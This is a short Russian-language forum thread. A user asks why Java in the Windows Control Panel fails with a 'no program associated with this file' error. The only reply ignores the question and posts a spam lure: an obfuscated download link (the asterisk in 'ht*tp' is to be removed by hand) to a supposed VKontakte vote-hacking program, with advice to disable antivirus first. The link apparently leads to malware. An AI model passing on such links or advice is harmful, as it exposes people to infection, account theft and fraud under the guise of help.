Анатолий Самойлов

Этому файлу не сопоставлена программа для выполнения этого действия. Установите программу, или, если она уже установлена

Проблема с java в павнели управления нажимаю на папку с ней он выдаёт ошибку а открыть с помощью не получается даже если создать ярлык как решить проблему??

Виталий Гинейко

ht*tp://rghost.ru/42891328 -программа для взлома вконтакте на голоса ((рекомендуется отключить антивирус) (Смс и номер телефона вводить не нужно) (в ht*tp звёздочку убрать и адрес вписать в адресную строку)